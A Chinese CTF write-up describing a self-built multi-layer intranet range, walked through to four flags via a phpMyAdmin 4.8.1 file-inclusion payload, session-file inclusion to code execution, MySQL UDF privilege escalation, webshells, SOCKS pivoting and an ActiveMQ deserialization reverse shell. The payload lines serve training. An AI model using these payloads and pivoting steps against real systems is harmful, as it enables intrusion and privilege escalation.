CFS学习 | 一道简单的CFS题目

白帽子社区

共 1159字,需浏览 3分钟

 ·

2022-02-19 15:29

本文来自“白帽子社区知识星球”

作者:BL



白帽子社区知识星球
加入星球,共同进步

前段时间玩几场比赛的CFS题目时,因为环境时静态原因被搅shi棍恶心到了,然后就写了个基于CTFD的动态网络CFS靶场插件(借鉴于赵师傅的CTFd-Whale)。

特点:

  • 每套都是独立环境(包括内网,flag)
  • 快速部署,快速启动
  • 支持平台靶机分离,可设置多个靶机服务器

后期会上线到BMZCTF平台上,大家敬请期待。

进入正题

下发靶场


c312818afac490deb43943e1bc219205.webp

01

flag1

打开靶机


d1e570320dcc301868d574ac199bc8b3.webp

发现版本为phpmyadmin4.8.1,存在文件包含漏洞

/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

f47e8096889088873d9e29a880554770.webp

尝试包含session来getshell

先execute

select ''

查看本机cookie,尝试包含

/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_45b4695c8561b696a0b49e75118e44e9&a=phpinfo();

fe9ff0ede0fc4474a73b3352c2ec8ba2.webp

为了后期的方便,可以直接写个post一句话上蚁剑。

根目录找到flag1:

flag1:flag{518e4

59016561835f79a1aea3ff62a9b56d02.webp

02

flag2


查看网卡


0fc2c9549e9b1b8c5a8f13e5d7ef7a4e.webp


存在2个段,上fscan,扫内网


cf27d2937fa96dce6daa7986fed8d7b1.webp


23段有一台mysql,并且是弱口令。

利用蚁剑自带数据库连接插件去连接,但是数据库中没找到有用的信息。


d0fe528beeb51cb4a18ac800b460469f.webp


既然是root权限,尝试udf提权


show variables like '%plugin%';

81e073f0c64317064de270d1cd91099b.webp


d283d33de16ba6d13140e1e59d9d801d.webp

create function sys_eval returns string soname 'udf.so';

373d57ba4a4542b2573c13bd44d34b18.webp


成功,不过flag不在根目录,尝试找flag


4f7e0b18efffa0731ec67edf4019185a.webp


flag2:

flag2:3854d654c

ae80be7e7ad84cd2cdbeda24b531c265.webp

03
flag3


描24段


d77c9cb9000326e375b6ea4294dd13de.webp


上传nps搭建socks代理


af1c4f9511c1b2cc8cc1717a0665a574.webp


本地连接


8dd0cc206115e0a51353636d9f1af51a.webp


利用proxifer做本地全局代理

上传Behinder。


cf5084f3a99439a3239b142866669233.webp


连接成功


d95c794f001e18612e06e9b2ac839749.webp


在var目录下找到flag3

flag3:76b336a8e

adaf1bbb5f11aaac4aee47b4fdf861fe.webp

04

flag4




继续看内网


89e3c2505553f72dbb0ffad0f5bb2e5a.webp


上fscan继续扫


df44c6902bd33003d65c275a576aaa4c.webp


在29段有一台apache activemq,存在一个反序列化rce。

因为这台机子有java环境,所以可以直接在目标机器中打


71d385617b377acb19ba826531748102.webp


利用Behinder的socks隧道再创建一个代理,访问activemq的web端触发payload


4ce72a7717be83e03926063082394d0f.webp


efa2bceeb45fa1d0e83ad545e30f6bf8.webp


反弹回来,查找flag


892d185ab15f743a9ceec98e895f484b.webp

flag4:

flag4:1999b98a0}


拼接flag提交。


0697b568373201776c91f1909c2f224d.webp


如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。


▼扫码关注白帽子社区公众号&加入知识星球▼


浏览 35
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报